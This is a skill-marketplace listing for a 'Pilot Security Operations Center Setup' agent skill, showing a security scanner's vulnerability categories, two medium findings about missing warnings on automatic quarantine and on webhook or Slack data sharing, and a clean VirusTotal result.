ClawHub

Pilot Security Operations Center Setup

Security checks across malware telemetry and agentic risk

Overview

This is a disclosed SOC setup recipe, but users should review its automatic blocking, quarantine, trust, and external notification behavior before production use.

Install only in an environment where you are comfortable with agent handshakes, event sharing on the Pilot network, and possible automated blocklist or quarantine actions. Review each dependent pilot-* skill, test in monitor-only or a lab network first, define rollback/unquarantine procedures, and limit Slack or webhook payloads to approved, non-sensitive fields.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
  • Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
Findings (2)

Missing User Warnings

Medium
Confidence
89% confidence
Finding
The README promotes automatic blocking and quarantining of nodes but does not warn that these actions can disrupt legitimate traffic, isolate healthy systems, or cause self-inflicted denial of service if detections are wrong. In a SOC automation skill, that omission is security-relevant because operators may enable aggressive enforcement without understanding operational blast radius or rollback requirements.

Missing User Warnings

Medium
Confidence
86% confidence
Finding
The skill describes sending incident data via webhooks and Slack without warning that security events, hostnames, IPs, usernames, and incident metadata may leave the controlled environment and be exposed to third-party services. In a SOC context, this increases the chance of privacy leaks, compliance issues, and unintended disclosure of sensitive security telemetry.

VirusTotal

66/66 vendors flagged this skill as clean.

View on VirusTotal